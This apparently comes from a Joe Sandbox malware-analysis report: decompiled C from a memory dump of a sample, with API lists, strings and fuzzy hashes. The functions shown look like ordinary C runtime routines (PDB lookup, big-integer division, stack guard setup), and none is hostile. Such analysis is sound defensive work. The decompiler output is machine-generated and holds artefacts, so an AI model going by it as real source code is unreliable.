                      												goto L45;
                      											} else {
                      												 *0xb337c9 = 1;
                      												L16:
                      												_t215 = GetProcAddress(_t83, "PDBOpenValidate5");
                      												if(_t215 == 0) {
                      													goto L45;
                      												} else {
                      													 *0x9d62b0(_a20, 0, 0, 0,  &_v52, 0, 0,  &_v28);
                      													if( *_t215() == 0) {
                      														goto L45;
                      													} else {
                      														_v12 = 0;
                      														_v40 = 0;
                      														 *0x9d62b0();
                      														if( *((intOrPtr*)( *((intOrPtr*)( *_v28))))() == 0x1329141) {
                      															 *0x9d62b0(0, "r",  &_v36);
                      															if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() != 0) {
                      																 *0x9d62b0(_v16, _t149,  &_v24, 0, 0, 0);
                      																if( *((intOrPtr*)( *((intOrPtr*)( *_v36 + 0x20))))() != 0) {
                      																	 *0x9d62b0( &_v12);
                      																	if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x68))))() != 0) {
                      																		_t204 = _v12;
                      																		if(_t204 != 0) {
                      																			 *0x9d62b0();
                      																			if( *((intOrPtr*)( *((intOrPtr*)( *_t204 + 8))))() == 0) {
                      																				L29:
                      																				_t174 = 0;
                      																				goto L30;
                      																			} else {
                      																				while(1) {
                      																					 *0x9d62b0(0,  &_v32,  &_v8,  &_v44,  &_v20, 0);
                      																					if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))() == 0) {
                      																						goto L31;
                      																					}
                      																					if((_v8 & 0x0000ffff) != _v16) {
                      																						L28:
                      																						 *0x9d62b0();
                      																						if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))() != 0) {
                      																							continue;
                      																						} else {
                      																							goto L29;
                      																						}
                      																					} else {
                      																						_t181 = _v32;
                      																						if(_t181 > _t149 || _t149 >= _v44 + _t181) {
                      																							goto L28;
                      																						} else {
                      																							_t228 = _v20;
                      																							if(_t228 == 0 || _t228 >= 0x1fffffff) {
                      																								goto L31;
                      																							} else {
                      																								_t135 = HeapAlloc(GetProcessHeap(), 0, _t228 << 3);
                      																								_v16 = _t135;
                      																								if(_t135 == 0) {
                      																									goto L31;
                      																								} else {
                      																									 *0x9d62b0( &_v48, 0, 0, 0,  &_v20, _t135);
                      																									_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))();
                      																									_t174 = _v16;
                      																									if(_t139 == 0) {
                      																										L30:
                      																										HeapFree(GetProcessHeap(), 0, _t174);
                      																										goto L31;
                      																									} else {
                      																										_t151 = _t149 - _v32;
                      																										if(_t151 >=  *_t174) {
                      																											_t192 = _v20;
                      																											_t140 = 1;
                      																											if(_t192 > 1) {
                      																												while(_t151 >=  *((intOrPtr*)(_t174 + _t140 * 8))) {
                      																													_t140 = _t140 + 1;
                      																													if(_t140 < _t192) {
                      																														continue;
                      																													}
                      																													goto L43;
                      																												}
                      																											}
                      																											L43:
                      																											 *_a16 =  *(_t174 + _t140 * 8 - 4) & 0x00ffffff;
                      																											 *0x9d62b0(_v48, _a8,  &_a12, 0, 0, 0);
                      																											_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x70))))();
                      																											_t174 = _v16;
                      																											if(_t146 != 0) {
                      																												_v40 = 1;
                      																											}
                      																										}
                      																										goto L30;
                      																									}
                      																									goto L34;
                      																								}
                      																							}
                      																							goto L46;
                      																						}
                      																					}
                      																					goto L31;
                      																				}
                      																			}
                      																			L31:
                      																			 *0x9d62b0();
                      																			 *((intOrPtr*)( *((intOrPtr*)( *_v12))))();
                      																		}
                      																	}
                      																	 *0x9d62b0();
                      																	 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x40))))();
                      																}
                      																 *0x9d62b0();
                      																 *((intOrPtr*)( *((intOrPtr*)( *_v36 + 0x38))))();
                      															}
                      														}
                      														L34:
                      														 *0x9d62b0();
                      														 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x2c))))();
                      														return _v40;
                      													}
                      												}
                      											}
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				L46:
                      			}










































                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C,00000000,?,Runtime Check Error. Unable to display RTC Message.), ref: 009D20F5
                        • Part of subcall function 009D24B0: GetModuleFileNameW.KERNEL32(?,?,009D2111,?,009D2111,?,?,009D1975), ref: 009D24BF
                      • GetProcAddress.KERNEL32(?,PDBOpenValidate5), ref: 009D21BF
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D231C
                      • HeapFree.KERNEL32(00000000), ref: 009D2323
                      • GetProcessHeap.KERNEL32 ref: 009D2394
                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 009D239E
                      Strings
                      • Runtime Check Error. Unable to display RTC Message., xrefs: 009D20DB
                      • PDBOpenValidate5, xrefs: 009D21B9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Heap$Process$AddressAllocFileFreeModuleNameProcQueryVirtual
                      • String ID: PDBOpenValidate5$Runtime Check Error. Unable to display RTC Message.
                      • API String ID: 3872449310-425978220
                      • Opcode ID: e8776431c6581f906e528d36f46a09651007088e3cd405ba4206ecc08ef792ca
                      • Instruction ID: 8fa39a5ed7b0ef612f08e89b22046acb9d2bb61b5aad2babca76bca142e9bafb
                      • Opcode Fuzzy Hash: e8776431c6581f906e528d36f46a09651007088e3cd405ba4206ecc08ef792ca
                      • Instruction Fuzzy Hash: 11B19F35A402199FCF15DFA4C844BAEB7BAFF98710F188056EA11E7390DB75AD42CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E009BAC80(void* __ebx, signed int* _a4, signed int* _a8) {
                      				signed int _v8;
                      				char _v472;
                      				char _v936;
                      				char _v1400;
                      				signed int _v1404;
                      				signed int _v1408;
                      				signed int _v1412;
                      				signed int _v1416;
                      				signed int _v1420;
                      				signed int _v1424;
                      				signed int _v1428;
                      				signed int _v1432;
                      				signed int _v1436;
                      				signed int _v1440;
                      				signed int _v1444;
                      				signed int _v1448;
                      				signed int _v1452;
                      				signed int _v1456;
                      				signed int _v1460;
                      				signed int _v1464;
                      				signed int _v1468;
                      				signed int _v1472;
                      				signed int _v1476;
                      				signed int _v1480;
                      				intOrPtr _v1484;
                      				signed int _v1488;
                      				signed int _v1492;
                      				signed int _v1496;
                      				signed int _v1500;
                      				signed int _v1504;
                      				signed int _v1508;
                      				signed int _v1512;
                      				signed int _v1516;
                      				signed int _v1520;
                      				signed int _v1524;
                      				signed int _v1528;
                      				signed int _v1532;
                      				signed int _v1536;
                      				intOrPtr _v1540;
                      				signed int _v1544;
                      				signed int _v1548;
                      				signed int _v1552;
                      				intOrPtr _v1556;
                      				intOrPtr _v1560;
                      				intOrPtr _v1564;
                      				signed int _v1568;
                      				intOrPtr _v1572;
                      				intOrPtr _v1576;
                      				signed int _v1580;
                      				intOrPtr _v1584;
                      				intOrPtr _v1588;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t401;
                      				signed int* _t408;
                      				signed int _t410;
                      				signed int _t414;
                      				signed int _t419;
                      				signed int _t421;
                      				signed int _t426;
                      				signed int _t437;
                      				void* _t442;
                      				signed int _t453;
                      				void* _t455;
                      				intOrPtr _t466;
                      				signed int _t468;
                      				signed int _t480;
                      				signed int* _t491;
                      				void* _t496;
                      				void* _t498;
                      				signed int* _t508;
                      				void* _t514;
                      				void* _t515;
                      				signed int _t519;
                      				signed int _t523;
                      				signed int _t529;
                      				signed int* _t534;
                      				signed int _t554;
                      				signed int _t564;
                      				signed int _t568;
                      				signed int* _t588;
                      				signed int _t590;
                      				signed int _t607;
                      				signed int _t623;
                      				signed int _t626;
                      				signed int _t628;
                      				signed int _t634;
                      				intOrPtr _t635;
                      				signed int _t647;
                      				intOrPtr _t650;
                      				signed int _t660;
                      				intOrPtr _t661;
                      				signed int* _t662;
                      				signed int _t666;
                      				signed int _t669;
                      				signed int _t670;
                      				intOrPtr _t674;
                      				signed int _t687;
                      				signed int _t688;
                      				intOrPtr _t697;
                      				intOrPtr _t699;
                      				signed int _t703;
                      				void* _t714;
                      				signed int* _t720;
                      				void* _t721;
                      				signed int* _t727;
                      				signed int _t732;
                      				signed int _t734;
                      				void* _t735;
                      				void* _t736;
                      
                      				_t515 = __ebx;
                      				_t732 = _t734;
                      				_t735 = _t734 - 0x630;
                      				_t401 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t401 ^ _t732;
                      				if( *_a4 != 0) {
                      					__eflags =  *_a8;
                      					if( *_a8 != 0) {
                      						_v1420 =  *_a4 - 1;
                      						_t519 =  *_a8 - 1;
                      						__eflags = _t519;
                      						_v1496 = _t519;
                      						if(_t519 != 0) {
                      							__eflags = _v1496 - _v1420;
                      							if(_v1496 <= _v1420) {
                      								_v1408 = _v1496 + 1;
                      								_v1500 = _v1420 - _v1496;
                      								_v1456 = _v1500;
                      								_v1432 = _v1420;
                      								while(1) {
                      									__eflags = _v1432 - _v1500;
                      									if(_v1432 < _v1500) {
                      										break;
                      									}
                      									_t623 = _v1432 - _v1500;
                      									_t408 = _a8;
                      									_t523 = _v1432;
                      									_t720 = _a4;
                      									_t124 = _t623 * 4; // 0xfff15885
                      									__eflags =  *((intOrPtr*)(_t408 + _t124 + 4)) -  *((intOrPtr*)(_t720 + 4 + _t523 * 4));
                      									if( *((intOrPtr*)(_t408 + _t124 + 4)) ==  *((intOrPtr*)(_t720 + 4 + _t523 * 4))) {
                      										_t626 = _v1432 - 1;
                      										__eflags = _t626;
                      										_v1432 = _t626;
                      										continue;
                      									} else {
                      										_t410 = _v1432 - _v1500;
                      										_t588 = _a8;
                      										_t688 = _v1432;
                      										_t727 = _a4;
                      										_t135 = _t410 * 4; // 0xfff15885
                      										__eflags =  *((intOrPtr*)(_t588 + _t135 + 4)) -  *((intOrPtr*)(_t727 + 4 + _t688 * 4));
                      										if( *((intOrPtr*)(_t588 + _t135 + 4)) <  *((intOrPtr*)(_t727 + 4 + _t688 * 4))) {
                      											_t590 = _v1456 + 1;
                      											__eflags = _t590;
                      											_v1456 = _t590;
                      										}
                      									}
                      									L35:
                      									__eflags = _v1456;
                      									if(__eflags != 0) {
                      										_v1440 = _a8[_v1408];
                      										_t628 = _v1408;
                      										_t413 = _a8;
                      										_t151 = _t628 * 4; // 0x55d
                      										_v1460 =  *((intOrPtr*)(_a8 + _t151 - 4));
                      										_push(_v1440);
                      										_t414 = E009BAC40(_t413,  *((intOrPtr*)(_a8 + _t151 - 4)), __eflags);
                      										_t736 = _t735 + 4;
                      										_v1436 = _t414;
                      										_v1504 = 0x20 - _v1436;
                      										__eflags = _v1436;
                      										if(_v1436 > 0) {
                      											_v1440 = _v1440 << _v1436 | _v1460 >> _v1504;
                      											_v1460 = _v1460 << _v1436;
                      											__eflags = _v1408 - 2;
                      											if(_v1408 > 2) {
                      												_t171 = _v1408 * 4; // 0xe851ffff
                      												_t687 =  *(_a8 + _t171 - 8) >> _v1504 | _v1460;
                      												__eflags = _t687;
                      												_v1460 = _t687;
                      											}
                      										}
                      										_v1524 = 0;
                      										_v1520 = 0;
                      										_v1404 = _v1456;
                      										while(1) {
                      											_t529 = _v1404 - 1;
                      											__eflags = _t529;
                      											_v1404 = _t529;
                      											if(_t529 < 0) {
                      												break;
                      											}
                      											__eflags = _v1404 + _v1408 - _v1420;
                      											if(_v1404 + _v1408 > _v1420) {
                      												_v1532 = 0;
                      											} else {
                      												_v1532 =  *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1408) * 4));
                      											}
                      											_v1540 = _v1532;
                      											_v1488 = _a4[_v1404 + _v1408];
                      											_v1484 = 0;
                      											 *((intOrPtr*)(_t732 + 0xbad5e1)) = _v1540;
                      											_v1464 =  *((intOrPtr*)(_a4 + (_v1404 + _v1408) * 4 - 4));
                      											__eflags = _v1436;
                      											if(_v1436 > 0) {
                      												_t674 = _v1484;
                      												_v1488 = E009CEC00(_v1488, _v1436, _t674) | _v1464 >> _v1504;
                      												_v1484 = _t674;
                      												_v1464 = _v1464 << _v1436;
                      												__eflags = _v1404 + _v1408 - 3;
                      												if(_v1404 + _v1408 >= 3) {
                      													_t480 =  *(_a4 + (_v1404 + _v1408) * 4 - 8) >> _v1504 | _v1464;
                      													__eflags = _t480;
                      													_v1464 = _t480;
                      												}
                      											}
                      											_v1416 = E009CEC20(_v1488, _v1484, _v1440, 0);
                      											_v1412 = 0;
                      											_v1476 = E009CEC90(_v1488, _v1484, _v1440, 0);
                      											_v1472 = 0;
                      											__eflags = _v1412;
                      											if(_v1412 > 0) {
                      												L50:
                      												_t647 = _v1440;
                      												asm("sbb esi, 0x0");
                      												_t437 = E009CED40(_t647, 0, _v1416 - 0xffffffff, _v1412) + _v1476;
                      												__eflags = _t437;
                      												asm("adc edx, [ebp-0x5bc]");
                      												_v1476 = _t437;
                      												_v1472 = _t647;
                      												_v1416 = 0xffffffff;
                      												_v1412 = 0;
                      											} else {
                      												__eflags = _v1416 - 0xffffffff;
                      												if(_v1416 <= 0xffffffff) {
                      													goto L51;
                      												} else {
                      													goto L50;
                      												}
                      												while(1) {
                      													L51:
                      													__eflags = _v1472;
                      													if(__eflags > 0) {
                      														break;
                      													}
                      													if(__eflags < 0) {
                      														L54:
                      														_t669 = _v1416;
                      														_t466 = E009CED40(_t669, _v1412, _v1460, 0);
                      														_t670 = _v1472;
                      														_t468 = E009CEC00(_v1476, 0x20, _t670);
                      														_v1588 = _t466;
                      														_v1584 = _t669;
                      														_v1568 = _t468 | _v1464;
                      														_v1564 = _t670;
                      														__eflags = _v1584 - _v1564;
                      														if(__eflags >= 0) {
                      															if(__eflags > 0) {
                      																L57:
                      																asm("sbb edx, 0x0");
                      																_v1416 = _v1416 - 1;
                      																asm("adc ecx, [ebp-0x5bc]");
                      																_v1476 = _v1440 + _v1476;
                      																_v1472 = 0;
                      																continue;
                      															} else {
                      																__eflags = _v1588 - _v1568;
                      																if(_v1588 > _v1568) {
                      																	goto L57;
                      																}
                      															}
                      														}
                      													} else {
                      														__eflags = _v1476 - 0xffffffff;
                      														if(_v1476 <= 0xffffffff) {
                      															goto L54;
                      														}
                      													}
                      													break;
                      												}
                      												__eflags = _v1412;
                      												if(_v1412 > 0) {
                      													L60:
                      													_v1428 = 0;
                      													_v1424 = 0;
                      													_v1444 = 0;
                      													while(1) {
                      														__eflags = _v1444 - _v1408;
                      														if(_v1444 >= _v1408) {
                      															break;
                      														}
                      														_t290 = _v1444 * 4; // 0xfff15885
                      														_t660 = _v1416;
                      														_t455 = E009BBCE0(_t660, _v1412,  *((intOrPtr*)(_a8 + _t290 + 4)));
                      														_t736 = _t736 + 0xc;
                      														asm("adc edx, [ebp-0x58c]");
                      														_v1428 = _t455 + _v1428;
                      														_v1424 = _t660;
                      														_v1536 = _v1428;
                      														_t661 = _v1424;
                      														_v1428 = E009CEEF0(_v1428, 0x20, _t661);
                      														_v1424 = _t661;
                      														_t564 = _v1404 + _v1444;
                      														_t662 = _a4;
                      														__eflags =  *((intOrPtr*)(_t662 + 4 + _t564 * 4)) - _v1536;
                      														if( *((intOrPtr*)(_t662 + 4 + _t564 * 4)) < _v1536) {
                      															_t568 = _v1428 + 1;
                      															__eflags = _t568;
                      															asm("adc edx, 0x0");
                      															_v1428 = _t568;
                      														}
                      														 *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1444) * 4)) =  *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1444) * 4)) - _v1536;
                      														_t666 = _v1444 + 1;
                      														__eflags = _t666;
                      														_v1444 = _t666;
                      													}
                      													_v1576 = _v1540;
                      													_v1572 = 0;
                      													__eflags = _v1572 - _v1424;
                      													if(__eflags <= 0) {
                      														if(__eflags < 0) {
                      															L69:
                      															_v1528 = 0;
                      															_v1468 = 0;
                      															while(1) {
                      																__eflags = _v1468 - _v1408;
                      																if(_v1468 >= _v1408) {
                      																	break;
                      																}
                      																_t349 = _v1468 * 4; // 0xfff15885
                      																asm("adc edx, edi");
                      																asm("adc edx, eax");
                      																_v1560 =  *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1468) * 4)) +  *((intOrPtr*)(_a8 + _t349 + 4)) + _v1528;
                      																_v1556 = 0;
                      																 *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1468) * 4)) = _v1560;
                      																_v1528 = E009CEEF0(_v1560, 0x20, _v1556);
                      																_t453 = _v1468 + 1;
                      																__eflags = _t453;
                      																_v1468 = _t453;
                      															}
                      															_t554 = _v1416 - 1;
                      															__eflags = _t554;
                      															asm("sbb edx, 0x0");
                      															_v1416 = _t554;
                      														} else {
                      															__eflags = _v1576 - _v1428;
                      															if(_v1576 < _v1428) {
                      																goto L69;
                      															}
                      														}
                      													}
                      													_v1420 = _v1404 + _v1408 - 1;
                      												} else {
                      													__eflags = _v1416;
                      													if(_v1416 > 0) {
                      														goto L60;
                      													}
                      												}
                      												_t650 = _v1520;
                      												_t442 = E009CEC00(_v1524, 0x20, _t650);
                      												asm("adc edx, ecx");
                      												_v1524 = _t442 + _v1416;
                      												_v1520 = _t650;
                      												continue;
                      											}
                      											goto L51;
                      										}
                      										_v1508 = _v1420 + 1;
                      										while(1) {
                      											__eflags = _v1508 -  *_a4;
                      											if(_v1508 >=  *_a4) {
                      												break;
                      											}
                      											 *((intOrPtr*)(_a4 + 4 + _v1508 * 4)) = 0;
                      											_t426 = _v1508 + 1;
                      											__eflags = _t426;
                      											_v1508 = _t426;
                      										}
                      										_t634 = _v1420 + 1;
                      										__eflags = _t634;
                      										 *_a4 = _t634;
                      										while(1) {
                      											__eflags =  *_a4;
                      											if( *_a4 == 0) {
                      												break;
                      											}
                      											_t421 =  *_a4;
                      											_t534 = _a4;
                      											__eflags =  *(_t534 + _t421 * 4);
                      											if( *(_t534 + _t421 * 4) == 0) {
                      												 *_a4 =  *_a4 - 1;
                      												continue;
                      											}
                      											break;
                      										}
                      										_t419 = _v1524;
                      										_t635 = _v1520;
                      									} else {
                      										_t419 = 0;
                      										_t635 = 0;
                      									}
                      									goto L85;
                      								}
                      								_v1456 = _v1456 + 1;
                      								goto L35;
                      							} else {
                      								_t419 = 0;
                      								_t635 = 0;
                      							}
                      						} else {
                      							_v1480 = _a8[1];
                      							__eflags = _v1480 - 1;
                      							if(_v1480 != 1) {
                      								__eflags = _v1420;
                      								if(_v1420 != 0) {
                      									_v1516 = 0;
                      									_v1512 = 0;
                      									_v1452 = 0;
                      									_v1448 = 0;
                      									_v1492 = _v1420;
                      									while(1) {
                      										__eflags = _v1492 - 0xffffffff;
                      										if(_v1492 == 0xffffffff) {
                      											break;
                      										}
                      										_t697 = _v1448;
                      										_v1452 = E009CEC00(_v1452, 0x20, _t697) |  *(_a4 + 4 + _v1492 * 4);
                      										_v1448 = _t697;
                      										_t699 = _v1512;
                      										_t496 = E009CEC00(_v1516, 0x20, _t699);
                      										_t498 = E009CEC20(_v1452, _v1448, _v1480, 0);
                      										asm("adc edi, ecx");
                      										_v1516 = _t496 + _t498;
                      										_v1512 = _t699;
                      										_t703 = _v1452;
                      										_v1452 = E009CEC90(_t703, _v1448, _v1480, 0);
                      										_v1448 = _t703;
                      										_t607 = _v1492 - 1;
                      										__eflags = _t607;
                      										_v1492 = _t607;
                      									}
                      									E009BAAB0(_a4, E009BA9F0( &_v472));
                      									_a4[0x2eb6ec] = E009CEEF0(_v1452, 0x20, _v1448);
                      									_a4[1] = _v1452;
                      									_t491 = _a4;
                      									__eflags =  *(_t491 + 0xbadbb1);
                      									if( *(_t491 + 0xbadbb1) <= 0) {
                      										_v1552 = 1;
                      									} else {
                      										_v1552 = 2;
                      									}
                      									 *_a4 = _v1552;
                      									_t419 = _v1516;
                      									_t635 = _v1512;
                      								} else {
                      									_v1544 = _a4[1];
                      									E009BAAB0(_a4, E009BA9F0( &_v936));
                      									_a4[1] = _v1544 % _v1480;
                      									_t508 = _a4;
                      									__eflags =  *(_t508 + 4);
                      									if( *(_t508 + 4) <= 0) {
                      										_v1548 = 0;
                      									} else {
                      										_v1548 = 1;
                      									}
                      									 *_a4 = _v1548;
                      									_t419 = _v1544 / _v1480;
                      									_t635 = 0;
                      								}
                      							} else {
                      								_v1580 = _a4[1];
                      								E009BAAB0(_a4, E009BA9F0( &_v1400));
                      								_t635 = 0;
                      								_t419 = _v1580;
                      							}
                      						}
                      					} else {
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t514 = L00994930(0, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_big_integer.h", 0x2da, 0, L"%ls", L"(\"Division by zero\", false)");
                      							__eflags = _t514 - 1;
                      							if(_t514 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						_t419 = 0;
                      						_t635 = 0;
                      					}
                      				} else {
                      					_t419 = 0;
                      					_t635 = 0;
                      				}
                      				L85:
                      				_pop(_t714);
                      				_pop(_t721);
                      				return E00957280(_t419, _t515, _v8 ^ _t732, _t635, _t714, _t721);
                      			}

                      Strings
                      • %ls, xrefs: 009BACB9
                      • ("Division by zero", false), xrefs: 009BACB4
                      • minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h, xrefs: 009BACC5
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Division by zero", false)$minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
                      • API String ID: 0-226933
                      • Opcode ID: 0a1d24179e7e9e2d813eac419cac6faae416786f34d4229e627e481f2fe24308
                      • Instruction ID: d285ca53b6c859057806ccaa624b6ca5cd6c9adad29d07595a139086a45b23f8
                      • Opcode Fuzzy Hash: 0a1d24179e7e9e2d813eac419cac6faae416786f34d4229e627e481f2fe24308
                      • Instruction Fuzzy Hash: 0C629A74A04928CFDB64CF18CD94BAAB7B2BB88316F1081D9D84DA7385DB756E81CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 41%
                      			E00956AF9() {
                      				int _t1;
                      				intOrPtr _t2;
                      				void* _t4;
                      				intOrPtr _t9;
                      				void* _t13;
                      				intOrPtr* _t16;
                      
                      				_t1 = IsProcessorFeaturePresent(0xc);
                      				if(_t1 != 0) {
                      					_t16 =  *[fs:0x30] + 0x34;
                      					_t2 =  *_t16;
                      					if(_t2 != 0) {
                      						L7:
                      						 *0xb30208 = _t2;
                      						_t4 = 1;
                      					} else {
                      						_t4 = HeapAlloc(GetProcessHeap(), 8, 8);
                      						_t13 = _t4;
                      						if(_t13 != 0) {
                      							__imp__InitializeSListHead(_t13);
                      							asm("lock cmpxchg [esi], ecx");
                      							if(0 != 0) {
                      								HeapFree(GetProcessHeap(), 0, _t13);
                      							}
                      							_t2 =  *_t16;
                      							goto L7;
                      						}
                      					}
                      					return _t4;
                      				} else {
                      					_t9 = _t1 + 1;
                      					 *0xb30208 = _t9;
                      					return _t9;
                      				}
                      			}

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000C,009569F5,00000000,?,00956BAD,?,?,00944CBB), ref: 00956AFB
                      • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,00956BAD,?,?,00944CBB), ref: 00956B22
                      • HeapAlloc.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956B29
                      • InitializeSListHead.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956B36
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00956BAD,?,?,00944CBB), ref: 00956B4B
                      • HeapFree.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956B52
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                      • String ID:
                      • API String ID: 1475849761-0
                      • Opcode ID: 9ac9f34b92a21ed73976ea8b29c28b3046cc8f7d21d5c3d2b14fff83bd3291c3
                      • Instruction ID: f3ff984d72d8fac6882d1335b92862c5098e3a74b763feb56511d1a85656dd25
                      • Opcode Fuzzy Hash: 9ac9f34b92a21ed73976ea8b29c28b3046cc8f7d21d5c3d2b14fff83bd3291c3
                      • Instruction Fuzzy Hash: 91F04F756A96019BDB509F7AEC0CB1677A8BF95B17F10442AEA82D3250EB3088459760
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E0096B663(void* __edx) {
                      				signed int _v8;
                      				char _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				long _v24;
                      				struct _MEMORY_BASIC_INFORMATION _v52;
                      				struct _SYSTEM_INFO _v88;
                      				void* _v100;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t18;
                      				void* _t20;
                      				void* _t22;
                      				char _t24;
                      				long _t30;
                      				signed int _t37;
                      				void* _t41;
                      				void* _t42;
                      				signed int _t44;
                      				long _t46;
                      				char _t47;
                      				signed int _t50;
                      				void* _t51;
                      
                      				_t41 = __edx;
                      				_t18 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t18 ^ _t50;
                      				_t20 = 4;
                      				E009CED10(_t20);
                      				_t22 = _t51;
                      				_v16 = _t22;
                      				if(VirtualQuery(_t22,  &_v52, 0x1c) == 0) {
                      					L12:
                      					_t24 = 0;
                      				} else {
                      					_v20 = _v52.AllocationBase;
                      					GetSystemInfo( &_v88);
                      					_t37 = _v88.dwPageSize;
                      					_t47 = 0;
                      					_v12 = 0;
                      					if(E009A4000( &_v12) != 0 && _v12 > 0) {
                      						_t47 = _v12;
                      					}
                      					_t44 =  ~_t37;
                      					_t46 = _t47 - 0x00000001 + _t37 & _t44;
                      					if(_t46 != 0) {
                      						_t46 = _t46 + _t37;
                      					}
                      					_t30 = _t37 + _t37;
                      					if(_t46 < _t30) {
                      						_t46 = _t30;
                      					}
                      					_t42 = (_t44 & _v16) - _t46;
                      					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
                      						goto L12;
                      					} else {
                      						_t24 = 1;
                      					}
                      				}
                      				return E00957280(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
                      			}

                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0096B68C
                      • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0096B6A0
                      • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0096B6F0
                      • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 0096B705
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Virtual$AllocInfoProtectQuerySystem
                      • String ID:
                      • API String ID: 3562403962-0
                      • Opcode ID: ada71e2edff46d8e06081ad044d7f756f9ab949e92b7413c70dc06d407987db8
                      • Instruction ID: 704a97b348411ae0137467768880729f6f56d9e39009175a3589c4f91b5b6373
                      • Opcode Fuzzy Hash: ada71e2edff46d8e06081ad044d7f756f9ab949e92b7413c70dc06d407987db8
                      • Instruction Fuzzy Hash: EB219072E04129ABDB20DFA5DC85AEFB7BCEF84754F040526E906E7141E7309984DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00958A40(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                      				char _v0;
                      				void* _v5;
                      				signed char _v6;
                      				long _v12;
                      				struct _EXCEPTION_POINTERS _v20;
